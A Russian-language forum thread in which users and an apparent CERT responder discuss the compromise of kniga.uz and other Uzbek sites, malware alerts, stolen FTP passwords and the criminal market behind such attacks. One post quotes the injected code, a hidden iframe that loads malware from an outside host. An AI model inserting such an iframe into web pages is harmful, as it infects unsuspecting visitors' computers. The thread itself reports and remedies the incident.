Решила посмотреть новые книги на http://kniga.uz/
Получила вот что :
http://www.uforum.uz/imagehosting/79046ee7257dd613.jpg

Это то же самое, что и на сайте ЕС?

Решила посмотреть новые книги на http://kniga.uz/
Получила вот что :
http://www.uforum.uz/imagehosting/79046ee7257dd613.jpg

Это то же самое, что и на сайте ЕС?

Да, действительно на данном веб-сайте был обнаружен код загружающий на компьютер посетителя вредоносное ПО. Предположительно злоумышленниками был получен доступ к фтп данного сайта и в index был внедрен следующий код:

<iframe src="http://miron555.org/s/index.php" width="0" height="0" style="display:none"></iframe>

При переходе по этой ссылке на Ваш компьютер попыталось установиться вредоносное ПО, но судя по скрину, было тут же блокировано и удалено.

Спасибо за информацию. Владельцы данного веб-сайта будут оповещены об инциденте.

Я попробовала отправить им сообщение по адресу, заявленному на сайте - оно вернулось с сообщением, что "таких нет"

Это то же самое, что и на сайте ЕС?

Я-то вылечил Арбуз кое-как... почти месяц мучился... а на книгу-уз Касперский ругается...

Значит, вирусы живут в арбузах и книгах :-)

Как у Булгакова:
- Не читайте перед едой советских газет.
- Так других нет.
- Никаких не читайте.

На сегодняшний день веб-сайт kniga.uz излечен. Вредоносные ссылки с вирусами были убраны. Пароли изменены. Связь с администраторами ресурса налажена.

Я-то вылечил Арбуз кое-как... почти месяц мучился... а на книгу-уз Касперский ругается...

Значит, вирусы живут в арбузах и книгах :-)

Да. поэтому решили переписать весь сайт занова

Лучше посмотрите как ломали ваш сайт. Скорее всего по FTP воровали пароли. А то сайт перепишите, а история повторится.
А лучшего всего к CERT обратитесь. Раз уж они профессионалы, он смогут вам помочь.

Да пороли взяли по ftp, даже догадываемся кто своровал, кто крипты и ифреимы вставлял,
давно хотели ухудшить сайт, вот как раз подходящий момент, к новому году на сайте будет много полезного и нового.
а CERTу блогадарность очень большое.

давно хотели ухудшить сайт
Давайте лучше улучшайте. Не надо нам плохих сайтов :)

Ну на сколько я знаю есть круг людей которые зарабатывают деньги причем ОООчень не плохие используя внедрение вредоносного кода в корыстных целях. Даже не факт что те люди которые увели Ваш пароль от ФТП, Вам и вставили iframe. Пароли на ФТП "воруют" элементарным перебором паролей - "брут" нарывается, ну а потом продают эти пароли пачками , но это только вершина айсберга, после в основном другими уже людьми эти iframe и вставляются в индексные страницы "взломанных" ресурсов и потом начинается самое интересное - внедрение опасного ПО в компьютер жертвы - они же посетитель "зараженного" ресурса. Ну а для каких целей они пытаются Вам его внедрить - ну ..... применений много, кража логинов и паролей, рассылка спама, DDos атаки и так далее, ээээ не все так просто :) это целая индустрия, причем там крутятся ОООчень большие деньги, некоторые так сказать "продукты" для данной отрасли стоят не мало денег, не вы наверное не правильно сейчас поняли :) не малых это порядка 5 000, 10 000 уе и до бесконечности, в зависимости от задач, так что пока люди зарабатывают на этом деньки это будет продолжаться и развиваться.

Хмм... сейчас посмотрел статистику на cert.uz по угрозам и что интересно заражены многие сайты которые хостятся у Billur`a, может ноги растут от туда? может у самого хостера ДЫРА?

PS: Алексей так как мы с Вами знакомы уже лет 10 почти, я думаю Вы на меня сильно не станите обижаться за мои предположения.

Пытался сегодня зайти на сайт - KIS ругается
(обнаружено: троянская программа Trojan-Clicker.HTML.IFrame.bk URL: http://kniga.uz/)

Это то же самое, что и на сайте ЕС?

Я-то вылечил Арбуз кое-как... почти месяц мучился... а на книгу-уз Касперский ругается...

Значит, вирусы живут в арбузах и книгах :-)

Нарвался на DoS.JS.Dframe.n в http://arbuz.uz/registr.php

Кто тут спрашивал есть ли жизнь в узнете :)?

Это то же самое, что и на сайте ЕС?

Я-то вылечил Арбуз кое-как... почти месяц мучился... а на книгу-уз Касперский ругается...

Значит, вирусы живут в арбузах и книгах :-)

Нарвался на DoS.JS.Dframe.n в http://arbuz.uz/registr.php

есть еще парочка файлов пхп-шных с заразой, никак руки не дойдут почистить или поудалять их